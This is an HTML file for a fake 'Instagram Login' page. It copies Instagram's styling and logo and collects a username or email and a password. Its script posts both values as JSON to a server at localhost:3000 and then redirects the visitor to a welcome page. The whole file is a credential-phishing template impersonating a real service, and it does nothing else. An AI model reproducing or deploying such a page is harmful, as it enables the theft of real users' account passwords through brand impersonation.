<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram Login</title>
    <style>
        body {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            font-family: Arial, sans-serif;
            background-color: #fafafa;
        }
        .login-container {
            width: 300px;
            padding: 20px;
            border: 1px solid #dbdbdb;
            background-color: #fff;
        }
        .login-container img {
            display: block;
            margin: 0 auto 20px;
        }
        .login-container input {
            width: 100%;
            padding: 10px;
            margin-bottom: 10px;
            border: 1px solid #dbdbdb;
            border-radius: 3px;
        }
        .login-container button {
            width: 100%;
            padding: 10px;
            background-color: #3897f0;
            border: none;
            border-radius: 3px;
            color: white;
            font-weight: bold;
        }
    </style>
</head>
<body>
    <div class="login-container">
        <img src="https://upload.wikimedia.org/wikipedia/commons/a/a5/Instagram_icon.png" alt="Instagram logo" width="100">
        <form id="loginForm">
            <input type="text" id="userId" placeholder="Phone number, username, or email" required>
            <input type="password" id="password" placeholder="Password" required>
            <button type="submit">Log In</button>
        </form>
    </div>

    <script>
        document.getElementById('loginForm').addEventListener('submit', function(event) {
            event.preventDefault();
            // Get the entered ID and password
            var userId = document.getElementById('userId').value;
            var password = document.getElementById('password').value;
            
            // Send the ID and password to the server
            fetch('http://localhost:3000/login', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({ userId: userId, password: password })
            })
            .then(response => response.text())
            .then(data => {
                console.log(data);
                // Redirect to the welcome page
                window.location.href = 'welcome.html';
            })
            .catch(error => console.error('Error:', error));
        });
    </script>
</body>
</html>
